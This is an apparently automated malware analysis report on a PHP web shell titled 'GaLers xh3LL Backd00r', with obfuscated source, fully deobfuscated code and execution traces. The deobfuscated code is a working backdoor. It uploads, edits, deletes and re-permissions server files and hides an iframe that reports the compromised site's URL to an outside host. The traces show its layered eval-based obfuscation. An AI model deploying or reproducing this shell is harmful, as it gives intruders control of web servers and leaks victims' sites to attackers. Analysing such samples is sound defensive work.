PHP Malware Analysis
galersshell.php
md5: ce8860fca9d4e0ebce30ecc1675aadd5
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
Environment
- error_reporting (Deobfuscated, Traces)
- getcwd (Deobfuscated, Traces)
- set_time_limit (Deobfuscated, Traces)
Execution
Files
- copy (Deobfuscated, Traces)
- file_get_contents (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Title
- GaLers xh3LL Backd00r (Deobfuscated, HTML, Traces)
URLs
- http://localhost/uploads/galersshell.php (Traces)
- https://spamshell.xyz/write.php?get= (Deobfuscated)
- https://spamshell.xyz/write.php?get=$site (Traces)
- https://spamshell.xyz/write.php?get=http://localhost/galersshell.php (HTML)
Deobfuscated PHP code
<?php
$stt1 = "Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNzC4pSi4upI5yUWJxqZhKfkpqcn5KqAbSzKLVMQ6W4pMRAEwlYAwA=";
$stt0 = "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";
eval /* PHPDeobfuscator eval output */ {
$site = 'http://' . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
echo "<iframe style='display:none; height: 0; width:0;' src='https://spamshell.xyz/write.php?get={$site}'></iframe>";
set_time_limit(0);
error_reporting(0);
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
echo "<!DOCTYPE HTML>\r\n<HTML>\r\n<HEAD>\r\n<link href=\"\" rel=\"stylesheet\" type=\"text/css\">\r\n<title>GaLers xh3LL Backd00r</title>\r\n<style>\r\nbody{\r\nfont-family: \"Racing Sans One\", cursive;\r\nbackground-color: #e6e6e6;\r\ntext-shadow:0px 0px 1px #757575;\r\n}\r\n#content tr:hover{\r\nbackground-color: #636263;\r\ntext-shadow:0px 0px 10px #fff;\r\n}\r\n#content .first{\r\nbackground-color: silver;\r\n}\r\n#content .first:hover{\r\nbackground-color: silver;\r\ntext-shadow:0px 0px 1px #757575;\r\n}\r\ntable{\r\nborder: 1px #000000 dotted;\r\n}\r\nH1{\r\nfont-family: \"Rye\", cursive;\r\n}\r\na{\r\ncolor: #000;\r\ntext-decoration: none;\r\n}\r\na:hover{\r\ncolor: #fff;\r\ntext-shadow:0px 0px 10px #ffffff;\r\n}\r\ninput,select,textarea{\r\nborder: 1px #000000 solid;\r\n-moz-border-radius: 5px;\r\n-webkit-border-radius:5px;\r\nborder-radius:5px;\r\n}\r\n</style>\r\n</HEAD>\r\n<BODY>\r\n<H1><center>[#] GaLers xh3LL Backd00r [#] </center></H1>\r\n<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr><td>Current Path : ";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<a href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo "</td></tr><tr><td>";
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo "<font color=\"green\">File Upload Done Kakak ~_^ .</font><br />";
} else {
echo "<font color=\"red\">File Upload Error ~_~.</font><br />";
}
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\">\r\nUpload File : <input type=\"file\" name=\"file\" />\r\n<input type=\"submit\" value=\"upload\" />\r\n</form>\r\n</td></tr>";
if (isset($_GET['filesrc'])) {
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo "</tr></td></table><br />";
echo '<pre>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre>';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['path'], $_POST['perm'])) {
echo "<font color=\"green\">Change Permission Done.</font><br />";
} else {
echo "<font color=\"red\">Change Permission Error.</font><br />";
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo "<font color=\"green\">Change Name Done.</font><br />";
} else {
echo "<font color=\"red\">Change Name Error.</font><br />";
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo "<font color=\"green\">Edit File Done ~_^.</font><br />";
} else {
echo "<font color=\"red\">Edit File Error ~_~.</font><br />";
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>';
}
echo "</center>";
} else {
echo "</table><br /><center>";
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo "<font color=\"green\">Delete Dir Done.</font><br />";
} else {
echo "<font color=\"red\">Delete Dir Error.</font><br />";
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo "<font color=\"green\">Delete File Done.</font><br />";
} else {
echo "<font color=\"red\">Delete File Error.</font><br />";
}
}
}
echo "</center>";
$scandir = scandir($path);
echo "<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr class=\"first\">\r\n<td><center>Name</center></td>\r\n<td><center>Size</center></td>\r\n<td><center>Permissions</center></td>\r\n<td><center>Options</center></td>\r\n</tr>";
foreach ($scandir as $dir) {
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "<tr>\r\n<td><a href=\"?path={$path}/{$dir}\">{$dir}</a></td>\r\n<td><center>--</center></td>\r\n<td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\r\n<select name=\"opt\">\r\n<option value=\"\"></option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\r\n<input type=\"submit\" value=\">\" />\r\n</form></center></td>\r\n</tr>";
}
echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
foreach ($scandir as $file) {
if (!is_file("{$path}/{$file}")) {
continue;
}
$size = filesize("{$path}/{$file}") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
echo "<tr>\r\n<td><a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\r\n<td><center>" . $size . "</center></td>\r\n<td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\r\n<select name=\"opt\">\r\n<option value=\"\"></option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n<option value=\"edit\">Edit</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"file\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$file}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\r\n<input type=\"submit\" value=\">\" />\r\n</form></center></td>\r\n</tr>";
}
echo "</table>\r\n</div>";
}
echo "<br />Mr. DellatioNx196 GaLers xh3LL Backd00r <font color=\"red\">1.0</font>, Coded By <font color=\"red\">Mr. DellatioNx196 - Bogor BlackHat</font>\r\n</BODY>\r\n</HTML>";
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xc000) == 0xc000) {
// Socket
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
// Group
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
// World
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}
};Execution traces
data/traces/ce8860fca9d4e0ebce30ecc1675aadd5_trace-1676262901.9125.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:35:27.810340]
1 0 1 0.000198 393576
1 3 0 0.000289 402416 {main} 1 /var/www/html/uploads/galersshell.php 0 0
1 A /var/www/html/uploads/galersshell.php 2 $stt1 = 'Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNzC4pSi4upI5yUWJxqZhKfkpqcn5KqAbSzKLVMQ6W4pMRAEwlYAwA='
1 A /var/www/html/uploads/galersshell.php 3 $stt0 = 'dsbep6usxzowq2c4dQKLm+y+SbHun6CR6iY2K7g3FxcmdkYWdIlD7IQrdsLs9dIbu7xKlQsm887xqxNOs3xwOCMu77Q3aH927egi7/nbUMy4w+WxRw28Zaj9RmqJ3DAkr0FO2//L/RXUPQUHjLqV+QdRxSqfDFV54r5kQ05qFubY+50mTWq8sTH+g1aWoxsm7ux1Hx97SRaofVcDzFOfKBn/85D0Sbdhrp1OodKQ0KuADhAOrQJNOAFrcM6tJOERoHP6BqKcIpWHhwlOHxWPhoKF0HpFCUmxacEGW5YMbrBMVHSJb4zMkWjjQ+aHjYrSD1l/BmbER8yBLaSIXzbQfx7QIrFVE1DIq1B+61pwgZgc9cRuILbwB82T98jJ72ms/6LxXF5UWlaIVVfHjp+J0cOysaeZy2IOSc1Ify0mFlPLV82slEURsU4PATwyzeoBvtEkodhNErgTch58XUZyWr3U0W9vy/W4f0yo3XvvmH/Z+lQawSi2X4dPXWYrs50g'
2 4 0 0.000352 402416 base64_decode 0 /var/www/html/uploads/galersshell.php 4 1 'Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNzC4pSi4upI5yUWJxqZhKfkpqcn5KqAbSzKLVMQ6W4pMRAEwlYAwA='
2 4 1 0.000372 402576
2 4 R 'K-K��P��S�+.)�/�/14�H���K�I,I\005�J��s\v�R���#��X�jf\022�������\001��(�LC����@\023\tX\003\000'
2 5 0 0.000397 402544 gzinflate 0 /var/www/html/uploads/galersshell.php 4 1 'K-K��P��S�+.)�/�/14�H���K�I,I\005�J��s\v�R���#��X�jf\022�������\001��(�LC����@\023\tX\003\000'
2 5 1 0.000422 402768
2 5 R 'eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($stt0))))))))))));'
2 6 0 0.000441 402608 htmlspecialchars_decode 0 /var/www/html/uploads/galersshell.php 4 1 'eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($stt0))))))))))));'
2 6 1 0.000459 402640
2 6 R 'eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($stt0))))))))))));'
2 7 0 0.000491 405808 eval 1 'eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($stt0))))))))))));' /var/www/html/uploads/galersshell.php 4 0
3 8 0 0.000510 405808 strrev 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code 1 1 'dsbep6usxzowq2c4dQKLm+y+SbHun6CR6iY2K7g3FxcmdkYWdIlD7IQrdsLs9dIbu7xKlQsm887xqxNOs3xwOCMu77Q3aH927egi7/nbUMy4w+WxRw28Zaj9RmqJ3DAkr0FO2//L/RXUPQUHjLqV+QdRxSqfDFV54r5kQ05qFubY+50mTWq8sTH+g1aWoxsm7ux1Hx97SRaofVcDzFOfKBn/85D0Sbdhrp1OodKQ0KuADhAOrQJNOAFrcM6tJOERoHP6BqKcIpWHhwlOHxWPhoKF0HpFCUmxacEGW5YMbrBMVHSJb4zMkWjjQ+aHjYrSD1l/BmbER8yBLaSIXzbQfx7QIrFVE1DIq1B+61pwgZgc9cRuILbwB82T98jJ72ms/6LxXF5UWlaIVVfHjp+J0cOysaeZy2IOSc1Ify0mFlPLV82slEURsU4PATwyzeoBvtEkodhNErgTch58XUZyWr3U0W9vy/W4f0yo3XvvmH/Z+lQawSi2X4dPXWYrs50g'
3 8 1 0.000537 409936
3 8 R 'eJwBvglB9gG5CUb2eJwBrglR9gGpCVb2eJwBnglh9gGZCWb2eJwBjglx9u1ZbXPaSBL+7ir/h4nCRVALSDherw8QrjhnO3e1FdvkpdYxPkrSjoZgIksDTFns3v72656RYARCZn2p/XRxbL1MzzPdPU+/DHRP/LlP9vf29yqBYJw4xJwz5rctyyRNUhme98/+2T+7NdV1+Ob9l755lxs56//jXf/8Yvju7LN519nf49HcI0ZXTGm44CRgk4Q7ZiwCPwknbddzeYfMuZjNWZvYHTIWMZu37Y5JAho5cu0AFg/8cBHMeZI07yffrDEF1Zqg6MmMM0cqava6llqiZ3RQ/YCzIRMLPkzEQrCqXUNVKPXokHLfo0y4M/Vyf09Mq4AzXIQzEQ1/HXmMB8OZH1Vrtd/296Ye5WE0r1aGb0/PL0gYkMojnzi9ytcwGXGUUCO3+PoO/BUwKvwgCUHdoJpKwTL/kf+lM8zui+vTq4uf3/bJp4svN739ve7y2n9/jddE'
3 9 0 0.000567 409904 base64_decode 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code 1 1 'eJwBvglB9gG5CUb2eJwBrglR9gGpCVb2eJwBnglh9gGZCWb2eJwBjglx9u1ZbXPaSBL+7ir/h4nCRVALSDherw8QrjhnO3e1FdvkpdYxPkrSjoZgIksDTFns3v72656RYARCZn2p/XRxbL1MzzPdPU+/DHRP/LlP9vf29yqBYJw4xJwz5rctyyRNUhme98/+2T+7NdV1+Ob9l755lxs56//jXf/8Yvju7LN519nf49HcI0ZXTGm44CRgk4Q7ZiwCPwknbddzeYfMuZjNWZvYHTIWMZu37Y5JAho5cu0AFg/8cBHMeZI07yffrDEF1Zqg6MmMM0cqava6llqiZ3RQ/YCzIRMLPkzEQrCqXUNVKPXokHLfo0y4M/Vyf09Mq4AzXIQzEQ1/HXmMB8OZH1Vrtd/296Ye5WE0r1aGb0/PL0gYkMojnzi9ytcwGXGUUCO3+PoO/BUwKvwgCUHdoJpKwTL/kf+lM8zui+vTq4uf3/bJp4svN739ve7y2n9/jddE'
3 9 1 0.000601 414032
3 9 R 'x�\001�\tA�\001�\tF�x�\001�\tQ�\001�\tV�x�\001�\ta�\001�\tf�x�\001�\tq��Yms�H\022��*����EP\vH8^�\017\020�8g;w�\025���1>JҎ�`"K\003LY���랑`\004Bf}��tql�L�3�=O�\ftO��O����*�`�8Ĝ3�-�$MR\031����?�5�u���y�\0339��]��b���y������#FWLi��$`��;f,\002?\t\'m�sy�̹��Y��\0352\0261���I\002\0329r�\000\026\017�p\021�y�4�\'߬1\005՚��Ɍ3G*j���Z�gtP���!\023\v>L�B��]CU(��rߣL�3�rOL��3\\�3\021\r\035y�\aÙ\037Uk����\036�a4�V�oO�/H\030��#�8���0\031q�P#���\016�\0250*� \tAݠ�J�2����3���ӫ���ɧ�/7��������D��dN��1\f'
3 10 0 0.000693 409904 gzuncompress 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code 1 1 'x�\001�\tA�\001�\tF�x�\001�\tQ�\001�\tV�x�\001�\ta�\001�\tf�x�\001�\tq��Yms�H\022��*����EP\vH8^�\017\020�8g;w�\025���1>JҎ�`"K\003LY���랑`\004Bf}��tql�L�3�=O�\ftO��O����*�`�8Ĝ3�-�$MR\031����?�5�u���y�\0339��]��b���y������#FWLi��$`��;f,\002?\t\'m�sy�̹��Y��\0352\0261���I\002\0329r�\000\026\017�p\021�y�4�\'߬1\005՚��Ɍ3G*j���Z�gtP���!\023\v>L�B��]CU(��rߣL�3�rOL��3\\�3\021\r\035y�\aÙ\037Uk����\036�a4�V�oO�/H\030��#�8���0\031q�P#���\016�\0250*� \tAݠ�J�2����3���ӫ���ɧ�/7��������D��dN��1\f'
3 10 1 0.000816 412496
3 10 R '\001�\tF�x�\001�\tQ�\001�\tV�x�\001�\ta�\001�\tf�x�\001�\tq��Yms�H\022��*����EP\vH8^�\017\020�8g;w�\025���1>JҎ�`"K\003LY���랑`\004Bf}��tql�L�3�=O�\ftO��O����*�`�8Ĝ3�-�$MR\031����?�5�u���y�\0339��]��b���y������#FWLi��$`��;f,\002?\t\'m�sy�̹��Y��\0352\0261���I\002\0329r�\000\026\017�p\021�y�4�\'߬1\005՚��Ɍ3G*j���Z�gtP���!\023\v>L�B��]CU(��rߣL�3�rOL��3\\�3\021\r\035y�\aÙ\037Uk����\036�a4�V�oO�/H\030��#�8���0\031q�P#���\016�\0250*� \tAݠ�J�2����3���ӫ���ɧ�/7��������D��dN��1\fBy�\030�q��'
3 11 0 0.000909 408368 gzinflate 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code 1 1 '\001�\tF�x�\001�\tQ�\001�\tV�x�\001�\ta�\001�\tf�x�\001�\tq��Yms�H\022��*����EP\vH8^�\017\020�8g;w�\025���1>JҎ�`"K\003LY���랑`\004Bf}��tql�L�3�=O�\ftO��O����*�`�8Ĝ3�-�$MR\031����?�5�u���y�\0339��]��b���y������#FWLi��$`��;f,\002?\t\'m�sy�̹��Y��\0352\0261���I\002\0329r�\000\026\017�p\021�y�4�\'߬1\005՚��Ɍ3G*j���Z�gtP���!\023\v>L�B��]CU(��rߣL�3�rOL��3\\�3\021\r\035y�\aÙ\037Uk����\036�a4�V�oO�/H\030��#�8���0\031q�P#���\016�\0250*� \tAݠ�J�2����3���ӫ���ɧ�/7��������D��dN��1\fBy�\030�q��'
3 11 1 0.000996 410960
3 11 R 'x�\001�\tQ�\001�\tV�x�\001�\ta�\001�\tf�x�\001�\tq��Yms�H\022��*����EP\vH8^�\017\020�8g;w�\025���1>JҎ�`"K\003LY���랑`\004Bf}��tql�L�3�=O�\ftO��O����*�`�8Ĝ3�-�$MR\031����?�5�u���y�\0339��]��b���y������#FWLi��$`��;f,\002?\t\'m�sy�̹��Y��\0352\0261���I\002\0329r�\000\026\017�p\021�y�4�\'߬1\005՚��Ɍ3G*j���Z�gtP���!\023\v>L�B��]CU(��rߣL�3�rOL��3\\�3\021\r\035y�\aÙ\037Uk����\036�a4�V�oO�/H\030��#�8���0\031q�P#���\016�\0250*� \tAݠ�J�2����3���ӫ���ɧ�/7��������D��dN��1\fBy�\030�q�əA����='
3 12 0 0.001085 408368 gzuncompress 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code 1 1 'x�\001�\tQ�\001�\tV�x�\001�\ta�\001�\tf�x�\001�\tq��Yms�H\022��*����EP\vH8^�\017\020�8g;w�\025���1>JҎ�`"K\003LY���랑`\004Bf}��tql�L�3�=O�\ftO��O����*�`�8Ĝ3�-�$MR\031����?�5�u���y�\0339��]��b���y������#FWLi��$`��;f,\002?\t\'m�sy�̹��Y��\0352\0261���I\002\0329r�\000\026\017�p\021�y�4�\'߬1\005՚��Ɍ3G*j���Z�gtP���!\023\v>L�B��]CU(��rߣL�3�rOL��3\\�3\021\r\035y�\aÙ\037Uk����\036�a4�V�oO�/H\030��#�8���0\031q�P#���\016�\0250*� \tAݠ�J�2����3���ӫ���ɧ�/7��������D��dN��1\fBy�\030�q�əA����='
3 12 1 0.001173 410960
3 12 R '\001�\tV�x�\001�\ta�\001�\tf�x�\001�\tq��Yms�H\022��*����EP\vH8^�\017\020�8g;w�\025���1>JҎ�`"K\003LY���랑`\004Bf}��tql�L�3�=O�\ftO��O����*�`�8Ĝ3�-�$MR\031����?�5�u���y�\0339��]��b���y������#FWLi��$`��;f,\002?\t\'m�sy�̹��Y��\0352\0261���I\002\0329r�\000\026\017�p\021�y�4�\'߬1\005՚��Ɍ3G*j���Z�gtP���!\023\v>L�B��]CU(��rߣL�3�rOL��3\\�3\021\r\035y�\aÙ\037Uk����\036�a4�V�oO�/H\030��#�8���0\031q�P#���\016�\0250*� \tAݠ�J�2����3���ӫ���ɧ�/7��������D��dN��1\fBy�\030�q�əA����=�� 0p\002\0'
3 13 0 0.001261 408368 gzinflate 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code 1 1 '\001�\tV�x�\001�\ta�\001�\tf�x�\001�\tq��Yms�H\022��*����EP\vH8^�\017\020�8g;w�\025���1>JҎ�`"K\003LY���랑`\004Bf}��tql�L�3�=O�\ftO��O����*�`�8Ĝ3�-�$MR\031����?�5�u���y�\0339��]��b���y������#FWLi��$`��;f,\002?\t\'m�sy�̹��Y��\0352\0261���I\002\0329r�\000\026\017�p\021�y�4�\'߬1\005՚��Ɍ3G*j���Z�gtP���!\023\v>L�B��]CU(��rߣL�3�rOL��3\\�3\021\r\035y�\aÙ\037Uk����\036�a4�V�oO�/H\030��#�8���0\031q�P#���\016�\0250*� \tAݠ�J�2����3���ӫ���ɧ�/7��������D��dN��1\fBy�\030�q�əA����=�� 0p\002\0'
3 13 1 0.001347 410960
